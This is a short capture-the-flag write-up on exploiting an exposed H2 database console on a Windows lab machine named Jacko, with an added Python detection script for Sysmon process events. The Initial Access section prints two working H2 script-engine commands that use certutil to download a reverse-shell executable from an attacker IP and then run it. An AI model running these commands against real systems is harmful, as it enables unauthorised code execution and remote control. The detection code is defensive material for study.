Jacko 🔸

Enumeration

The web server shows the welcome page of an H2 Java database.

The H2 console is exposed on port 8082.

Initial Access

We can access the console by clicking on Connect.

Then we can execute arbitrary commands as seen in https://www.exploit-db.com/exploits/49384.

Once all the commands from the exploit have been executed, we can upload a reverse shell and execute it.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.220/reverse.exe C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
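On the defensive side, both calls above leave a clear process-creation trail: a Java process spawning certutil with a URL, then launching a binary from a user profile. The following is an added example, not part of the original writeup, that triages Sysmon Event ID 1 style records for that pattern; the field names follow Sysmon, and the sample events, the Java install path, and the rule names are constructed for illustration.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 style records; every path other than the
# page's certutil command line is an assumption made for this example.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Java\bin\java.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://192.168.45.220/reverse.exe C:\users\tony\reverse.exe"},
    {"ParentImage": r"C:\Program Files\Java\bin\java.exe",
     "Image": r"C:\users\tony\reverse.exe",
     "CommandLine": r"C:\users\tony\reverse.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verifystore My"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Java\bin\java.exe",
     "CommandLine": "java -cp h2.jar org.h2.tools.Server"},
]

JAVA_HOSTS = {"java.exe", "javaw.exe"}
LOLBINS = {"certutil.exe", "cmd.exe", "powershell.exe"}
# certutil used as a downloader: -urlcache (or /urlcache) followed by a URL.
URLCACHE_FETCH = re.compile(r"[-/]urlcache\b.*\bhttps?://", re.IGNORECASE)


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def triage(event):
    """Return the rule names that fire for one process-creation event."""
    hits = []
    parent, child = base(event["ParentImage"]), base(event["Image"])
    if child == "certutil.exe" and URLCACHE_FETCH.search(event["CommandLine"]):
        hits.append("certutil_urlcache_download")
    if parent in JAVA_HOSTS:
        if child in LOLBINS:
            hits.append("java_spawned_lolbin")
        if event["Image"].lower().startswith("c:\\users\\"):
            hits.append("java_spawned_binary_from_user_profile")
    return hits


def scan(events):
    """Map event index -> fired rules, skipping events with no hits."""
    return {i: r for i, e in enumerate(events) if (r := triage(e))}
```

Calling `scan(SAMPLE_EVENTS)` flags the first two events and leaves the routine certutil and service-start events alone.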

We are a restricted user, so we reconstruct the PATH:

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0\;

Get the flag.

Privilege Escalation

Transfer winpeas.

We find a PaperStream IP program that seems out of the ordinary.

We search for an exploit.

We generate the reverse shell DLL and transfer it to the host.

Bug

It doesn't work with the PaperStream method or by abusing the SeImpersonatePrivilege method (juicypotato, godpotato, printspoofer...)